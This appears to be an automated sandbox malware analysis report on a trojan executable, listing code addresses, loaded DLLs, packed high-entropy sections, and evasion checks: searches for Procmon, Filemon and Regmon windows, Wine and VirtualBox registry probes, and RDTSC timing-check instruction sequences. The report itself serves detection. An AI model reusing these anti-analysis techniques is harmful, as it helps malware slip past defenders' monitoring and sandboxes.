      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9F1F61_2_00A9F1F6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A351CA1_2_00A351CA
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6B1CD1_2_00A6B1CD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF71DC1_2_00AF71DC
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD71D41_2_00AD71D4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B3D1CC1_2_00B3D1CC
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A731371_2_00A73137
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ABF1351_2_00ABF135
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9510C1_2_00A9510C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B371141_2_00B37114
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A4510F1_2_00A4510F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7B10B1_2_00A7B10B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AA311A1_2_00AA311A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9D11C1_2_00A9D11C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7511E1_2_00A7511E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ADB1671_2_00ADB167
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B1F16B1_2_00B1F16B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A8D1481_2_00A8D148
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B412B01_2_00B412B0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B032A11_2_00B032A1
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A952BD1_2_00A952BD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE72981_2_00AE7298
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5529A1_2_00A5529A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009E52DD1_2_009E52DD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACB2E91_2_00ACB2E9
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AED2E31_2_00AED2E3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009DB2E01_2_009DB2E0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B052341_2_00B05234
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A692351_2_00A69235
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A4123F1_2_00A4123F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B7F2121_2_00B7F212
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD12171_2_00AD1217
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AB92171_2_00AB9217
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009D52201_2_009D5220
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AC92401_2_00AC9240
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AFB2521_2_00AFB252
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3B3AD1_2_00A3B3AD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A2D3B71_2_00A2D3B7
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A333871_2_00A33387
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: String function: 009C8030 appears 44 times
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: String function: 009D4400 appears 65 times
      Source: mgEXk8ip26.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: mgEXk8ip26.exeStatic PE information: Section: ZLIB complexity 0.9973913741438356
      Source: mgEXk8ip26.exeStatic PE information: Section: mafhbcbe ZLIB complexity 0.9949235744251088
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@11/2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009F0C70 CoCreateInstance,1_2_009F0C70
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mgEXk8ip26.exeVirustotal: Detection: 51%
      Source: mgEXk8ip26.exeReversingLabs: Detection: 57%
      Source: mgEXk8ip26.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeFile read: C:\Users\user\Desktop\mgEXk8ip26.exeJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: mgEXk8ip26.exeStatic file information: File size 1812480 > 1048576
      Source: mgEXk8ip26.exeStatic PE information: Raw size of mafhbcbe is bigger than: 0x100000 < 0x192400

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeUnpacked PE file: 1.2.mgEXk8ip26.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mafhbcbe:EW;qztbpyyk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mafhbcbe:EW;qztbpyyk:EW;.taggant:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: mgEXk8ip26.exeStatic PE information: real checksum: 0x1c57bf should be: 0x1c574f
      Source: mgEXk8ip26.exeStatic PE information: section name:
      Source: mgEXk8ip26.exeStatic PE information: section name: .idata
      Source: mgEXk8ip26.exeStatic PE information: section name:
      Source: mgEXk8ip26.exeStatic PE information: section name: mafhbcbe
      Source: mgEXk8ip26.exeStatic PE information: section name: qztbpyyk
      Source: mgEXk8ip26.exeStatic PE information: section name: .taggant
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A18561 push edi; mov dword ptr [esp], 491C642Ch1_2_00A196E5
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A16081 push ecx; mov dword ptr [esp], esi1_2_00A1677A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C16088 push edi; mov dword ptr [esp], 7D560DBBh1_2_00C16126
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C3608F push edi; mov dword ptr [esp], ebp1_2_00C360B4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C3608F push 222572B7h; mov dword ptr [esp], ecx1_2_00C360FB
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C3608F push 4CD0390Fh; mov dword ptr [esp], eax1_2_00C36125
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A16030 push edx; mov dword ptr [esp], edi1_2_00A160FB
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C1E1E2 push 4F87F313h; mov dword ptr [esp], ecx1_2_00C1E37E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B24198 push edi; mov dword ptr [esp], esi1_2_00B24648
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B24198 push ebp; mov dword ptr [esp], esi1_2_00B2472B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B24198 push edx; mov dword ptr [esp], eax1_2_00B24791
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B24198 push ebp; mov dword ptr [esp], ecx1_2_00B2481C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C4A1EA push 26AFF980h; mov dword ptr [esp], ebp1_2_00C4A22A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00C3019C push 4EE1FB50h; mov dword ptr [esp], esi1_2_00C309A9
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A1C109 push edx; mov dword ptr [esp], ebx1_2_00A1C13F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A1C109 push eax; mov dword ptr [esp], edi1_2_00A1D8B0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A1C109 push eax; mov dword ptr [esp], ebx1_2_00A1D8C0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A1C109 push edi; mov dword ptr [esp], esp1_2_00A1D8C4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push ecx; mov dword ptr [esp], eax1_2_00A5A591
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push ebp; mov dword ptr [esp], ecx1_2_00A5A634
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push ebx; mov dword ptr [esp], 6B4D1EC6h1_2_00A5A677
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push 5A0E57DFh; mov dword ptr [esp], edx1_2_00A5A686
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push 4E191A61h; mov dword ptr [esp], ecx1_2_00A5A6FF
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push 3980903Ch; mov dword ptr [esp], ebp1_2_00A5A746
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push ebp; mov dword ptr [esp], 70BD39AFh1_2_00A5A762
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E push 08BED67Bh; mov dword ptr [esp], eax1_2_00A5A77A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A1615C push edx; mov dword ptr [esp], 43CDD200h1_2_00A1615D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00BF62FF push 2EDA0CACh; mov dword ptr [esp], edi1_2_00BF632C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B302DA push 016678CBh; mov dword ptr [esp], edx1_2_00B30884
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B302DA push edx; mov dword ptr [esp], esi1_2_00B308AE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B302DA push 16BAC7B2h; mov dword ptr [esp], ebx1_2_00B30985
      Source: mgEXk8ip26.exeStatic PE information: section name: entropy: 7.9812986672482875
      Source: mgEXk8ip26.exeStatic PE information: section name: mafhbcbe entropy: 7.954300989744655

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: FilemonclassJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B88B0A second address: B88B10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B88B10 second address: B88B36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FA398747046h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA39874704Fh 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B88B36 second address: B88B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398518360h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B88E35 second address: B88E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B88E3B second address: B88E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FA398518365h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007FA398518356h 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007FA398518356h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8A73E second address: B8A742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8A801 second address: B8A816 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA398518358h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8A816 second address: B8A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8A81B second address: B8A820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8A820 second address: B8A846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FA39874704Fh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 ja 00007FA398747046h 0x0000001b pop edi 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8A981 second address: B8A9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FA398518361h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 206E36A4h 0x00000014 sbb ecx, 5B76B333h 0x0000001a push 00000003h 0x0000001c movsx ecx, bx 0x0000001f jmp 00007FA39851835Eh 0x00000024 push 00000000h 0x00000026 mov dh, 07h 0x00000028 push 00000003h 0x0000002a add si, 1500h 0x0000002f adc cx, 21B8h 0x00000034 push 6E33C8EDh 0x00000039 pushad 0x0000003a pushad 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8AB0D second address: B8AB11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8AB11 second address: B8AB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 692FD9D6h 0x0000000e pushad 0x0000000f stc 0x00000010 popad 0x00000011 push 00000003h 0x00000013 movzx ecx, bx 0x00000016 jmp 00007FA39851835Bh 0x0000001b push 00000000h 0x0000001d jmp 00007FA398518368h 0x00000022 push 00000003h 0x00000024 mov ecx, dword ptr [ebp+122D28B3h] 0x0000002a push C90E6240h 0x0000002f pushad 0x00000030 push ecx 0x00000031 jmp 00007FA39851835Bh 0x00000036 pop ecx 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8AB6A second address: B8AB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor dword ptr [esp], 090E6240h 0x0000000d movsx ecx, si 0x00000010 lea ebx, dword ptr [ebp+124466ABh] 0x00000016 mov si, dx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B8AB8A second address: B8AB94 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA398518356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAA4B4 second address: BAA4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAA4B8 second address: BAA4C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA398518356h 0x00000008 je 00007FA398518356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAA4C8 second address: BAA4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA398747057h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAAB68 second address: BAAB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jg 00007FA398518356h 0x0000000c pop ebx 0x0000000d jo 00007FA398518358h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAAB82 second address: BAAB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FA398747046h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAAB95 second address: BAAB99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAAF9D second address: BAAFA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA398747046h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAB13E second address: BAB160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518368h 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FA398518356h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAB160 second address: BAB173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BA0FD3 second address: BA0FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA398518364h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BA0FEF second address: BA0FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BA0FF3 second address: BA1011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA39851835Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FA39851835Ah 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BA1011 second address: BA101B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA39874704Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BA101B second address: BA103A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FA398518356h 0x0000000e jmp 00007FA398518361h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABB2A second address: BABB34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABB34 second address: BABB58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA398518365h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jl 00007FA398518356h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABB58 second address: BABB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA39874704Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FA39874705Ah 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FA398747046h 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABCAF second address: BABCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABCB9 second address: BABCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABCBF second address: BABCC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABCC3 second address: BABCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BABE82 second address: BABE93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FA398518356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B81496 second address: B814CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 jmp 00007FA39874704Ah 0x0000000c jmp 00007FA39874704Bh 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA39874704Fh 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAC338 second address: BAC340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
